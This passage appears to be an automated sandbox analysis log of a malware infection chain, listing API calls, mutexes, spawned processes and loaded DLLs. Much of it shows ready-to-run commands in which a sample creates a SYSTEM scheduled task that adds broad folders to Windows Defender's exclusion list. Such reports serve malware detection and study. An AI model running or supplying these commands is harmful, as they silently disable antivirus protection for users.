                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041A8DE __EH_prolog,GetLastError,FormatMessageA,LocalFree,GetTickCount,49_2_0041A8DE
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,49_2_0043A30A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040DEFA GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,49_2_0040DEFA
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: CreateServiceA,49_2_00405581
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00421C40 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,48_2_00421C40
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00414AF3 CoCreateInstance,lstrcpy,lstrlen,MultiByteToWideChar,49_2_00414AF3
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A893C FindResourceA,LoadResource,LockResource,49_2_004A893C
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3Jump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].datJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6764:120:WilError_03
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeMutant created: \Sessions\1\BaseNamedObjects\S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeMutant created: \Sessions\1\BaseNamedObjects\E2D0491F7A75AE94FCCD983BDDFDOLED
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\8.210.66.183:8917:Sauron
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6188:120:WilError_03
                Source: C:\ProgramData\53jGFr5v.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAAAAAAAAAAAAC
                Source: C:\Users\user\Documents\l0tiFM.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\CCD983BDD1F7A75AE9E2D0494FFAOLED
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_284992
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6480:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6104:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: ^Iu44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3.dll44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3.dll44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3U.dll44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3U.dll44_2_00841000
                Source: C:\ProgramData\53jGFr5v.exeCommand line argument: .-C48_2_00432C80
                Source: 2976587-987347589.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Documents\l0tiFM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 2976587-987347589.07.exeVirustotal: Detection: 15%
                Source: DfP1K3.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
                Source: DfP1K3.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
                Source: DfP1K3.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
                Source: DfP1K3.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
                Source: DfP1K3.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
                Source: DfP1K3.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile read: C:\Users\user\Desktop\2976587-987347589.07.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\2976587-987347589.07.exe "C:\Users\user\Desktop\2976587-987347589.07.exe"
                Source: unknownProcess created: C:\Users\user\Documents\l0tiFM.exe C:\Users\user\Documents\l0tiFM.exe
                Source: unknownProcess created: C:\Users\user\Documents\l0tiFM.exe C:\Users\user\Documents\l0tiFM.exe
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknownProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknownProcess created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknownProcess created: C:\ProgramData\53jGFr5v.exe C:\ProgramData\53jGFr5v.exe
                Source: unknownProcess created: C:\ProgramData\efk2JUeS\lBoqoqIC.exe C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                Source: unknownProcess created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                Source: unknownProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknownProcess created: C:\ProgramData\atBs3ba9\d0oKoK2T.exe C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: pid.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: hid.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: vselog.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: vselog.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: mskeyprotect.dllJump to behavior
